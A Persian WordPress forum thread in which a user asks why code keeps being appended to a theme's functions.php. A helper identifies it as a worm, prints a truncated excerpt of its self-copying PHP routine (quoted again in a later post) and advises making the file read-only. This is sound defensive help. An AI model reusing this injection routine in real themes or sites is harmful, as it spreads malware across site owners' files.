• اطلاعیه ها

    • Saeed Fard

      برگزاری چهارمین همایش Coder Conf و کد تخفیف برای کاربران وردپرس پارسی   20/04/97

      کدرکانف هر سال در آخرین پنجشنبه مرداد با بورد‌های مختلفی برگزار می‌گردد،امسال نیز کدرکانف در همین تاریخ با حضور برنامه نویسان مطرح کشور در بورد تخصصی جاوااسکریپت برگزار خواهد شد، یک گردهمایی متفاوت با طعم Javascript. Coderconf هر سال نسبت به سال‌های گذشته با حضور برنامه‌نویسان پر رنگتر می‌شود. ما سعی کردیم هر ساله به این کنفرانس مفهوم عمیق تری ببخشیم تا از آنچه در سال‌های گذشته عرضه شده به روزتر و مفیدتر واقع شویم. امسال فرصتی خواهد بود تا با نگرشی جدید و بهبود مطالب ارائه شده، عمیقتر به این موضوع نگاه کنیم تا بجای تکرار مباحث پیشین گامی هر چند کوچک در مسیر ارتقای دانش فنی برنامه‌نویسان ایرانی برداریم. ما در Coderconf ۴ با تمرکز بر روی Javascript نیت کرده‌ایم این فرصت را در اختیار برنامه نویسان قرار دهیم تا با ظرافت و استانداردهای روز دنیا کار خود را پیش ببرند. به نظر ما امسال زمان آن فرا رسیده‌است تا این زبان را به صورت تخصصی و از ابعاد مختلف به چالش بکشیم.   دبیر علمی همایش میلاد حیدری، کدرکانف ۴ را اینگونه توصیف کرده است :اشتراک گذاری دانش بهترین راه رسیدن به جاودانگی اطلاعات است. هر ساله همایش‌های زیادی برگزار میشه که افراد شرکت‌کننده می‌توانند با افراد مجرب شبکه سازی کنند. امسال در کدرکانف سعی کردیم علاوه بر بخش شبکه سازی بین افراد بیشتر روی انتقال دانش و کیفیت ارائه ها تمرکز داشته باشیم . به قصد یک گردهمایی بلند مدت بین برنامه‌نویسان جاوااسکریپت که با هم تبادل دانش و اطلاعات کنند گردهم آییم.
      بنده به عنوان عضو کوچکی از جامعه برنامه‌نویسان جاوااسکریپت ایران امیدوارم در کدرکانف امسال علاوه بر شبکه سازی، از اطلاعاتی که دوستان در این همایش در اختیارتان قرار می‌دهند استفاده کنید. در سایت همایش میتوانید سخنرانان و موضوع پنل همایش کدرکانف رو مشاهده کنید . علاقه‌مندان به حضور در این همایش می‌توانند با کد تخفیف wpparsi اقدام به ثبت نام در این گردهمایی کنند. سایت همایش :‌http://coderconf.org
      بلیط فروشی همایش :‌https://evand.com/events/coderconf4  
021

مشکل با اضافه شدن خودکار کدها در فایل functions.php

7 پست در این موضوع قرار دارد

سلام

وقتی پوسته وردپرس رو در حالتی که دیباگ فعاله انتخاب میکنم با اخطارهای زیر روبرو میشم :

11.jpg

البته قبلش فایل فاکنشن رو چک کردم چیزی به جز کدهایی که خودم بهش اضافه کرده بودم نبود ولی بعد از فعال کردن پوسته کدهای زیر به آخر فایل فانکشن به صورت اتوماتیک اضافه شد ... :

ggg.jpg

میخوام بدونم باید چیکار کنم که این کدها اتوماتیک به فانکشن اضافه نشن ...

ممنون

0

به اشتراک گذاری این پست


لینک به پست

این کدها رو وردپرس اضافه میکنه

میتونید حذف کنید

و همچنین برای تکرار نشدن این مسئله permission نوشتن را از فایل بگیرید

3

به اشتراک گذاری این پست


لینک به پست

ارسال شده در (ویرایش شده)

ممنون آقا پارسا . راستش من میخوام قالبو بدم به یه نفر دیگه ... میخوام وقتی قالبو فعال میکنه این کدها اضافه نشن .. آیا میشه توی خود پوسته از کدی استفاده کرد که این کدها اتوماتیک لود نشن ؟؟

یه سوال دیگه هم داشتم :

بعضی وقتها که من تگها رو کپی میکنم و توی قالب میذارم مخصوصا تو header.php یه فاصله 26 پیکسلی به غیر از نوار مدیریت بالای هیدر سایت میافته ... باید چیکار کنم که این فاصله اضافه ایجاد نشه ؟

ویرایش شده در توسط 021
0

به اشتراک گذاری این پست


لینک به پست

سلام

این کدها Worm هستند:


<?php
function _check_active_widget(){
$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
$output=strip_tags($output, $allowed);
$direst=_get_all_widgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
if (is_array($direst)){
foreach ($direst as $item){
if (is_writable($item)){
$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));
$cont=file_get_contents($item);
if (stripos($cont,$ftion) === false){
$sar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
$output .= $before . "Not found" . $after;
if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
.
.
.
.
$request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts";
$posts=$wpdb->get_results($request);
$output="";
if ($posts) {
foreach ($posts as $post) {
$post_title=stripslashes($post->post_title);
$comment_count=$post->comment_count;
$permalink=get_permalink($post->ID);
$output .= $before . " <a href=\"" . $permalink . "\" title=\"" . $post_title."\">" . $post_title . "</a> " . $after;
}
} else {
$output .= $before . "None found" . $after;
}
return $output;
}
?>

فایل functions.php شما دارای این Worm هست و روی حالت فقط خواندنی قرار بدید تا این کرم به فایل دسترسی نداشته باشه و همچنین برای فایل functions.php دیگر پوسته ها این سطح دسترسی را نیز حتماً رعایت کنید.

3

به اشتراک گذاری این پست


لینک به پست

درست شد ممنون آقای حسینی ,

یه سوال دیگه هم داشتم:

بعضی وقتها که من تگها رو کپی میکنم و توی قالب میذارم مخصوصا تو header.php یه فاصله 26 پیکسلی به غیر از نوار مدیریت بالای هیدر سایت میافته ... باید چیکار کنم که این فاصله اضافه ایجاد نشه؟

یعنی ممکنه از کپی و پیس کردن تگها باشه ؟

0

به اشتراک گذاری این پست


لینک به پست

یه سوال دیگه هم داشتم :

بعضی وقتها که من تگها رو کپی میکنم و توی قالب میذارم مخصوصا تو header.php یه فاصله 26 پیکسلی به غیر از نوار مدیریت بالای هیدر سایت میافته ... باید چیکار کنم که این فاصله اضافه ایجاد نشه ؟

وجود تابع فوتر:


<?php wp_footer(); ?>

قبل از بسته شدن تگ های body و html و تابع هدر :


<?php wp_head(); ?>

قبل از بسته شدن تگ head را چک کنید.

4

به اشتراک گذاری این پست


لینک به پست

سلام

این کدها Worm هستند:


<?php
function _check_active_widget(){
$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
$output=strip_tags($output, $allowed);
$direst=_get_all_widgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
if (is_array($direst)){
foreach ($direst as $item){
if (is_writable($item)){
$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));
$cont=file_get_contents($item);
if (stripos($cont,$ftion) === false){
$sar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
$output .= $before . "Not found" . $after;
if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
.
.
.
.
$request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts";
$posts=$wpdb->get_results($request);
$output="";
if ($posts) {
foreach ($posts as $post) {
$post_title=stripslashes($post->post_title);
$comment_count=$post->comment_count;
$permalink=get_permalink($post->ID);
$output .= $before . " <a href=\"" . $permalink . "\" title=\"" . $post_title."\">" . $post_title . "</a> " . $after;
}
} else {
$output .= $before . "None found" . $after;
}
return $output;
}
?>

فایل functions.php شما دارای این Worm هست و روی حالت فقط خواندنی قرار بدید تا این کرم به فایل دسترسی نداشته باشه و همچنین برای فایل functions.php دیگر پوسته ها این سطح دسترسی را نیز حتماً رعایت کنید.

دوست عزیز از پاسخ بسیار دقیق و راهنمایی شما بسیار بسیار سپاسگزارم

راستش من هم دچار این مشکل بودم و اصلا نمی تونستم جلوی تکثیر این worm رو بگیرم و با راهنمایی شما این کار انجام شد

فقط می خوام بدونم آیا این کرم فایلهای دیگر رو هم دستکاری می کنه یا نه فقط فایل فانکشن رو تغییر میده؟؟؟؟؟

یه سوال دیگه هم اینکه این مشکل رو ریشه ای چطور می تونم حل کنم؟؟ یعنی خود worm رو پاکسازی کنم تا بعدا دوباره مشکلی ایجاد نشه؟؟؟؟

خیلی ممنون

0

به اشتراک گذاری این پست


لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری

  • مطالب مشابه

    • توسط kamran.azarniya@yahoo.com
      سلام و درود
      بنده در این سایتم کمی مشکل منو داشتم نمیدونم چه تنظیماتی کردم که منو از جایگاه اصلی خودش اومده پایینتر ، حالا به نظرتون باید چیکار کنم یا چه کدیو اصلاح کنم
      تشکر
      avahesab.ir
    • توسط vazizi69@yahoo.com
      سلام 
      چطور میتونم برای صفحه اصلی سایت و صفحه فروشگاه و یا برگه های دیگه برای هر کدوم  فهرست منو ( منوی اصلی افقی بالای صفحه ) متفات داشته باشم 
      مثلا منوی افقی بالای صفحه مخصوص محصولات رو فقط تو صفحه فروشگاه دیده بشه و در صفحه دیگه ای از سایت منوی دیگه ای رو تنظیم کنم که نشون داده بشه
    • توسط aref74
      با سلام خدمت عزیزان..بنده تازه با ووکامرس آشنا شدم ... چرا وقتی محصولی را ایجاد میکنم و انتشار میدهم در صفحه فروشگاه فقط محصول به تنهایی نشان داده میشود و هیچ گزینه ای برای قیمت و افزودن به سبد خرید نداره.

      سوال دیگرم این بود که برای ساختن اون لینک اختصاصی محصول بهترین روش چیه؟عدد بذاریم یا همون اسم محصول؟چون با اسم محصول ارور میده گویا باید صفحه اختصاصی بسازیم..

      با تشکر
    • توسط unid_user
      سلام دوستان
      من یه لودر با css ساختم میخواستم روی وب سایتم تست کنم. چطوری باید اینکار و انحام بدم که تا بالا اومدن سایت لودر کار کنه؟
      اصلا میسه کاری کنیم که عمدا سایت بعد از نمایش لودر بالا بیاد؟
      ممنون و سپاسگذار
    • توسط masoudmosleh267
      سلام دوستان. من یه سایتی رو از بکاپ گرفتم و از یه هاست و دامنه به یه هاست و دامنه جدید انتقال دادم. حالا چه سایت رو که باز میکنم چه وارد پیشخوان وردپرس میشم یه ارور میاد یکی از خطلی functions.php قالب رو نشون میده.
      Parse error: syntax error, unexpected 'class' (T_CLASS), expecting identifier (T_STRING) or variable (T_VARIABLE) or '{' or '$' in /public_html/wp-content/themes/khadamator/functions.php on line 1132
      مشکل چیه؟